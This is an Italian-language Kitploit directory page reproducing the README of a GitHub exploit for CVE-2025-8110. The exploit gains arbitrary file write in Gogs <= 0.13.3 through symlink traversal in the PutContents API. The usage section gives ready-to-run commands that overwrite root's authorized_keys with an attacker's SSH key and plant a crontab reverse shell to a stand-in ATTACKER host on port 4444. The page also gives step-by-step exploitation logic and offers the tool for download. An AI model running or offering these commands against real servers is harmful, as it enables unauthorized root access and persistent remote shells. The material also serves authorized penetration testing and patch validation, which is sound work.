Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-8110 — CVE-2025-8110 — Gogs <= 0.13.3 Scrittura Arbitraria di File tramite Attraversamento di Symlink nell'API PutContents | Kitploit
Strumenti/GitHubGitHub/3jee/cve-2025-8110
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneRed Teaming
GitHub3jee/cve-2025-8110

CVE-2025-8110

CVE-2025-8110 — Gogs <= 0.13.3 Scrittura Arbitraria di File tramite Attraversamento di Symlink nell'API PutContents

Vedi Repository
24 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-8110 — Gogs <= 0.13.3 Scrittura Arbitraria di File tramite Symlink Traversal

Panoramica

Gogs <= 0.13.3 è vulnerabile alla scrittura arbitraria di file attraverso l'API PutContents (/api/v1/repos/:owner/:repo/contents/:path).

L'API convalida i percorsi dei file per sequenze di directory traversal (../) ma non risolve i collegamenti simbolici prima della scrittura. Un utente autenticato può eseguire il push di un commit contenente un symlink che punta a qualsiasi file sul server, quindi chiamare PutContents su quel symlink per sovrascrivere il file di destinazione con contenuti controllati dall'attaccante.

Quando Gogs viene eseguito come root (predefinito in Docker e in molte distribuzioni), ciò comporta il compromesso completo del sistema.

DettaglioValore
CVECVE-2025-8110
AffettiGogs <= 0.13.3
TipoScrittura arbitraria di file autenticata → RCE
CVSS8.8 (Alto)
ComponenteAPI PutContents

Requisiti

  • Python 3.10+
  • requests (pip install requests)
  • CLI git
  • Un account Gogs valido (o registrazione aperta sul target)

Utilizzo

root@kitploit:~
# Auto-registra un account usa e getta + scrivi la chiave pubblica SSH per root
python3 CVE-2025-8110.py --url http://target:3001 --register \
    --target-file /root/.ssh/authorized_keys --content-file ~/.ssh/id_rsa.pub

# Con credenziali esistenti
python3 CVE-2025-8110.py --url http://target:3001 -u user -p pass \
    --target-file /root/.ssh/authorized_keys --content-file ~/.ssh/id_rsa.pub

# Reverse shell tramite crontab
python3 CVE-2025-8110.py --url http://target:3001 -u user -p pass \
    --target-file /etc/crontab \
    --content '* * * * * root bash -c "bash -i >& /dev/tcp/ATTACKER/4444 0>&1"'

# Pulisci il repository exploit dopo l'uso
python3 CVE-2025-8110.py --url http://target:3001 -u user -p pass \
    --target-file /root/.ssh/authorized_keys --content-file ~/.ssh/id_rsa.pub --cleanup

Come funziona

  1. Autenticazione — Accedi (o auto-registrati) e crea un token API.
  2. Crea un repository — Inizializza un nuovo repository con un README tramite l'interfaccia web.
  3. Esegui il push di un symlink — Clona il repository localmente, crea un symlink che punta al file di destinazione (ad es. /root/.ssh/authorized_keys), esegui commit e push.
  4. Scrivi attraverso il symlink — Chiama l'API PutContents sul nome del symlink. Gogs risolve il symlink su disco e scrive il contenuto dell'attaccante nel file reale come utente del processo Gogs (spesso root).

Opzioni

root@kitploit:~
--url             URL base di Gogs (es. http://target:3001)
-u, --user        Nome utente Gogs
-p, --password    Password Gogs
--register        Auto-registra un account usa e getta (nessun captcha)
--target-file     Percorso assoluto da sovrascrivere sul server
--content         Contenuto stringa da scrivere
--content-file    File locale il cui contenuto viene scritto
--repo            Nome del repository da creare (predefinito: casuale)
--link-name       Nome del symlink nel repository (predefinito: payload)
--cleanup         Elimina il repository exploit dopo la scrittura
## Dichiarazione di non responsabilità

Questo strumento è fornito esclusivamente per **test di sicurezza autorizzati e scopi educativi**. L'accesso non autorizzato a sistemi informatici è illegale. Utilizzare responsabilmente.
Scarica lo strumento